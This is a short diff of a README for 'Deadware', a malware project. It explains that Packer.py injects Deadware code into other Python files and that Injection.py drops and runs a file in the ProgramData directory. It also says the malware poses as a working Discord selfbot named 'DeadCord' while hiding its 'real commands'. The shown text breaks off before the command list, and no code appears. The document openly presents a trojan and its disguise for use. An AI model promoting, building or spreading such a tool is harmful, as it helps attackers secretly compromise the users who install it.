3ratic/Deadware/README.md

 ## Deadware Info
 `Packer.py` will inject the Deadware code into another python file.
+`Injection.py` will create a new file in the Program Data directory and then run `Deadware`

 As mentioned, Deadware is disguised as a selfbot called `DeadCord` which is a fully functioning selfbot with over 75 commands.
 However, the real commands are in the Deadware bot.
 The following list is the up to date commands: